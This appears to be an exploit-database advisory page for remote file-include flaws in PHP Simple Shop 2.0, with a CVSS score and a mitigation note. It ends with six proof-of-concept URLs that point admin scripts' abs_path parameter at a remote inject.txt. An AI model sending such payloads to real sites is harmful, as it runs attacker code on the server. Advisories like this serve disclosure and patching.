header-logo
Suggest Exploit
vendor:
PHP Simple Shop
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File-Include
98
CWE
Product Name: PHP Simple Shop
Affected Version From: 2
Affected Version To: 2
Patch Exists: YES
Related CWE: N/A
CPE: a:phpsimpleshop:phpsimpleshop
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

PHP Simple Shop Multiple Remote File-Include Vulnerabilities

PHP Simple Shop is prone to multiple remote file-include vulnerabilities. An attacker can exploit these issues to execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability. Additionally, the application should be kept up to date with the latest security patches.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/19382/info

PHP Simple Shop is prone to multiple remote file-include vulnerabilities. 

An attacker can exploit these issues to execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. 

Version 2.0 is vulnerable; other versions may also be affected.

http://www.example.com/[phpsimpleshop_path]/admin/index.php?abs_path=http://www.example2.com/inject.txt? http://www.example.com/[phpsimpleshop_path]/admin/adminindex.php?abs_path=http://www.example2.com/inject.txt? http://www.example.com/[phpsimpleshop_path]/admin/adminglobal.php?abs_path=http://www.example2.com/inject.txt? http://www.example.com/[phpsimpleshop_path]/admin/login.php?abs_path=http://www.example2.com/inject.txt? http://www.example.com/[phpsimpleshop_path]/admin/menu.php?abs_path=http://www.example2.com/inject.txt? http://www.example.com/[phpsimpleshop_path]/admin/header.php?abs_path=http://www.example2.com/inject.txt?